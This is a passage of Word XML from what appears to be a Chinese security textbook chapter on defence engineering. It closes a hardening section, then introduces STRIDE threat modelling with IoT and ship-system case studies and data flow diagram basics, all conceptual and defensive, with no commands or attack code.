        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者若突破边界（B），仍需在层层阻隔中移动，每一步都产生日志并被采集至</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM（G），达到防御纵深的效果。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="358"/>
    <w:bookmarkStart w:id="359" w:name="小结-23"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">主机/网络加固与最小权限并非孤立的安全配置，而是以“攻击者视角”反向推导出的必要控制措施。每一条基线命令背后，都对应本教材前四卷中真实攻击手法的失效条件。加固的本质是关闭攻击者赖以成功的“假设违规点”，并在此过程中为蓝队检测创造丰富的真实告警数据，最终在防御纵深中同时实现预防与检测的能力融合。下一节将引入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> STRIDE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">威胁模型，将这套思维方法左移至系统设计阶段。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="359"/>
    <w:bookmarkStart w:id="360" w:name="威胁建模stride与防御体系习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">20.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">威胁建模（STRIDE）与防御体系·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御工程的价值不在于“我们希望系统如何工作”，而在于主动追问“系统可能如何被破坏”。正是这一视角转换，将加固从“打补丁”提升为“设计阶段的对抗推演”。本节介绍两种相互补充的系统性方法——STRIDE威胁建模（帮助在设计阶段找威胁）与纵深防御体系（帮助在运行时分层抵御）——它们共同构成蓝队防御工程的方法论内核。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="360"/>
    <w:bookmarkStart w:id="361" w:name="授权与隔离声明框强制"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框（强制）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节讨论威胁建模方法论、防御体系架构原则以及习题与延伸阅读，属于面向防御的框架性知识①。本节不含针对具体靶机的实操命令；若读者将STRIDE分析应用于自有系统，请确保仅对已获得书面授权的系统架构进行建模，且析出的威胁详情按组织保密策略处理，不得在未经授权的情况下对外披露。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="361"/>
    <w:bookmarkStart w:id="362" w:name="前置依赖框馆藏与本书衔接"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框（馆藏与本书衔接）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节回指《从位到物联》第26章（子网划分与路由隔离）、第28章（防火墙与ACL的包过滤规则）、第7章（密码学原理模块CM5中的认证与完整性基础）。STRIDE中“欺骗”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“篡改”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“否认”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“信息泄露”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">四类威胁的分析直接依赖身份认证、消息完整性、抗否认与保密性等密码学原语，其数学基础已见于馆藏密码学模块，本节仅使用其安全属性结论，不重推数学。同时，本节与第19章检测工程、第20.1节主机/网络加固构成防御方法链：STRIDE帮助在设计阶段“找到该防什么”，纵深防御体系帮助在运行时“分层防住”。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="362"/>
    <w:bookmarkEnd w:id="363"/>
    <w:bookmarkStart w:id="365" w:name="威胁建模的动机与核心问题"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">20.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">威胁建模的动机与核心问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御者面临的根本困境在于资源有限而攻击面无限：系统有无数种可能被破坏的方式，但防御工程必须在有限的时间与预算内做出选择。威胁建模（Threat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Modeling）解决的就是这一“优先级困境”——它不是简单地罗列所有可能的攻击，而是提供一种结构化的方法，让防御者在系统设计阶段就能系统地识别哪些威胁最值得关注、哪些防御措施最紧迫。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从第一性原理看，威胁建模追问的核心问题是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“系统的信任边界在哪里？攻击者可能在哪些边界上违反我们的安全假设？”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">每一次成功的攻击，本质上都是某个安全假设的失效：服务器假设只有授权用户才能访问管理接口；IoT设备假设物理接口不会被恶意利用；网络协议假设通信对端是诚实的。威胁建模的任务，就是主动找出这些假设，然后设计让它们失效的对抗场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE正是为此目的而设计的一套威胁分类框架，由微软的Loren</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Kohnfelder和Praerit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Garg开发，其名称是六类威胁的英文首字母缩写：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1210"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">poofing（欺骗）：冒充他人或伪造身份；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1210"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ampering（篡改）：未经授权修改数据或代码；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1210"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">epudiation（否认）：执行操作后否认曾做过该操作；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1210"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nformation </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Disclosure（信息泄露）：将信息暴露给未授权的实体；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1210"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">enial of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Service（拒绝服务）：使合法用户无法正常使用服务；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1210"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">E</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">levation of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege（权限提升）：获取超出授权的系统权限。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这六类威胁的归纳基于一个朴素但极为有效的观察：几乎所有的安全攻击都可以归类为对“认证、完整性、非否认性、机密性、可用性、授权”这六项安全属性中某一项的违反。STRIDE因此提供了一张“威胁检查清单”——对系统中的每个组件和数据流，防御者依次审视这六类威胁，问自己：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“这里的身份验证机制是什么？攻击者能否绕过？这里的数据在传输或存储过程中是否受到完整性保护？操作日志是否足以支持审计和非否认？”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这种结构化的追问方式，使得威胁分析不再依赖分析者个人的“灵感”，而是成为一套可重复、可教学的工程实践。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与STRIDE互补的还有攻击树（Attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Tree）、攻击图（Attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Graph）、以及基于系统理论过程的STPA-Sec（System-Theoretic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Process Analysis for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Security）等方法。STRIDE的优势在于其简单性和与开发流程的契合度——它不需要复杂的数学建模，可以直接集成到敏捷开发的威胁建模阶段。关于STRIDE与其他方法的适用范围比较，可参见NIST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SP 800-154《Guide to Data-Centric System Threat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Modeling》中的讨论。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="364" w:name="stride在iot与cps场景中的应用映射"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE在IoT与CPS场景中的应用映射</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在IoT与信息物理系统（Cyber-Physical</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> System, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CPS）场景中，STRIDE的每一类威胁都有极为现实的体现。以一篇关于智慧农业IoT系统的STRIDE威胁建模研究为例（参见”STRIDE-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cyber Security Threat Modeling for IoT-enabled Precision Agriculture </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Systems”），该研究将精密农业的典型IoT架构——包括现场传感器层、网络传输层、云端数据层和决策应用层——逐层映射STRIDE六类威胁，最终识别出58个潜在安全问题。例如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗（Spoofing）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：恶意节点冒充合法的土壤湿度传感器，向云平台注入伪造的传感数据，导致灌溉决策系统做出错误判断；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">篡改（Tampering）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者在网络传输层截获并修改传感器读数，或在OTA（Over-the-Air，空中升级）固件更新过程中替换固件镜像；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">否认（Repudiation）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：系统管理员执行了危险的配置变更后否认该操作，而系统缺乏不可否认的审计日志；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">信息泄露（Information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Disclosure）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：田间的无线传感器通信未加密，攻击者通过被动嗅探获取农场的种植计划与产量数据；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">拒绝服务（Denial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Service）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对IoT网关发起泛洪攻击，使整个农场的传感数据无法上传，导致自动化灌溉系统因缺乏输入而停止工作；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1211"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">权限提升（Elevation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：攻击者通过固件漏洞从受限的传感器进程中逃逸，获取网关的root权限，进而横向移动至农场管理系统。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">另一项针对舰载信息系统（CyberShip）的对比研究（见”A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Comparative Risk Analysis on CyberShip System with STPA-Sec, STRIDE and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">CORAS”）在同一目标系统上分别应用STRIDE、STPA-Sec和CORAS三种方法，发现STRIDE能够有效识别组件层面的威胁，而STPA-Sec更擅长揭示组件交互导致的系统性危害。该研究建议在实际工程中将两者互补使用：以STRIDE的威胁分类结果作为STPA-Sec分析的输入，从而兼顾组件级与系统级的威胁覆盖。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这些研究共同说明一点：STRIDE不是空洞的清单，而是一套可以在任何具体系统架构上落地的“解剖工具”。对于读者而言，在分析自己的靶机环境或企业网络时，STRIDE提供了统一的语言和标准化的思考框架。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="364"/>
    <w:bookmarkEnd w:id="365"/>
    <w:bookmarkStart w:id="369" w:name="stride威胁建模方法详解"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">20.2.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE威胁建模方法详解</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="366" w:name="框架的核心工作单元数据流图dfd"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架的核心工作单元：数据流图（DFD）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE建模的起点并非威胁，而是系统的数据流图（Data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Flow Diagram, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DFD）。DFD以四个基本元素描述系统的信息流动：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1212"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">外部实体（External</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Entity）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：系统边界之外的数据源或数据消费者，通常是用户、外部服务或物理传感器，用矩形表示；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1212"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">进程（Process）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对数据执行操作的计算单元，可以是应用程序、微服务或处理函数，用圆形或圆角矩形表示；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1212"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">数据存储（Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Store）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：数据在系统内持久化或暂时存放的位置，如数据库、文件系统、消息队列，用两条平行线表示；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1212"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">数据流（Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Flow）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：数据在元素之间流动的路径，用单向箭头表示，箭头方向指示数据流向。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此外，现代DFD建模中常补充</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">信任边界（Trust</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Boundary）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的概念——用虚线框或虚线箭头标明系统内不同信任级别的区域边界。数据跨越信任边界的每一次流动，都是需要严格审视的威胁点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">DFD的绘制遵循分层递进原则：最顶层是上下文级DFD（Context</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagram），显示整个系统作为一个进程与外部实体之间的交互；然后逐层分解，将顶层进程展开为更细粒度的子进程和数据流。对于典型的三层Web应用，上下文级DFD将展示“用户”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“管理后台”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“第三方支付服务”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三个外部实体与“Web应用系统”之间的数据流；一级分解则可能展示“Web前端进程→业务逻辑进程→数据库存储”之间的内部数据流。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="366"/>
